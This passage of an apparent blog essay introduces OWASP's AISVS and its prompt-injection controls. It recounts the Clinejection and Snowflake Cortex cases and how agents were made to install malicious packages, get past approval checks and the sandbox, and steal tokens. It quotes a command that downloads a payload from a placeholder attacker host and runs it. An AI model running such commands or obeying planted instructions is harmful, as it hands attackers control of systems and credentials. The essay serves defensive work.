We spent twenty years getting web security to a place where it was boring. Boring was good. Boring meant it mostly worked. You’d run your OWASP Top 10 scanner, fix the SQL injection and XSS findings, check the boxes on the ASVS, and ship. Not glamorous. But it worked.
Then someone figured out you could steal a whole system’s secrets by asking it nicely.
That’s not a metaphor. In February 2026, security researcher Adnan Khan showed that you could compromise Cline’s production releases — an AI coding tool used by millions of developers — by opening a GitHub issue with a carefully crafted title. The issue title contained a prompt injection payload that tricked Claude into running npm install on a malicious package, which then poisoned the GitHub Actions cache and pivoted to steal the credentials that publish Cline’s VS Code extension. An issue title. Not a zero-day exploit, not a nation-state attack chain. Words in a text field.
This is the fundamental problem with AI security, and it’s the reason OWASP wrote the AI Security Verification Standard (AISVS). Traditional AppSec assumes deterministic programs: the code does what you wrote. Maybe what you wrote was wrong — a SQL injection, a buffer overflow — but the code executes faithfully. Fix the bug, it stays fixed. AI systems are probabilistic. The model doesn’t execute instructions; it generates plausible continuations. You can have perfect code, proper input validation, encrypted storage — and still get owned because someone hid instructions in a README file that the model decided to follow instead of yours.
Here’s the uncomfortable truth: many teams deploying AI today use API-based models they don’t control. They can’t inspect training data or run adversarial evaluations against someone else’s model. AISVS describes a comprehensive posture; most teams consuming foundation models through APIs control maybe 10% of it. I’ll come back to this.
The Three Chapters That Matter Most AISVS spans 14 chapters covering everything from training data provenance to human oversight. Rather than walking through all of them — you can read the spec yourself — I want to focus on the three that should be on every security engineer’s radar right now.
C2: User Input Validation — The Prompt Injection Chapter This is the chapter you implement first. Prompt injection is the SQL injection of AI systems: well-understood, frequently demonstrated, and still not consistently defended against. The Snowflake Cortex AI sandbox escape in March 2026 demonstrated this clearly. PromptArmor found that an indirect prompt injection hidden in a GitHub repository’s README could manipulate Snowflake’s Cortex Agent into executing cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) — bypassing the human-in-the-loop approval system because the command validation didn’t inspect code inside process substitution expressions. The agent then set a flag to execute outside the sandbox, downloaded malware, and used cached Snowflake tokens to exfiltrate data and drop tables. Two days after release. Fixed, but instructive.
AISVS C2 decomposes prompt injection defense into specific, testable controls. Requirement 2.1.1 mandates that all external inputs be treated as untrusted and screened by a prompt injection detection ruleset or classifier. Requirement 2.1.2 requires instruction hierarchy enforcement — system and developer messages must override user instructions across multi-step interactions. This is directly relevant to attacks like Clinejection, where the injected payload rode in through an issue title that was interpolated into the prompt without sanitization.
The chapter also addresses subtler vectors. Requirement 2.2.1 mandates Unicode normalization before tokenization — homoglyph swaps and invisible control characters are a real bypass technique against naive input filters. Section 2.7 covers multi-modal validation: text extracted from images and audio must be treated as untrusted per 2.1.1, and files must be scanned for steganographic payloads before ingestion.
For practitioners: start with 2.1.1 (prompt injection screening), 2.1.2 (instruction hierarchy), 2.4.1 (explicit input schemas), and 2.7.2 (treat extracted text as untrusted). That’s your Level 1 baseline.
C9: Autonomous Orchestration — The Agentic Risk Chapter...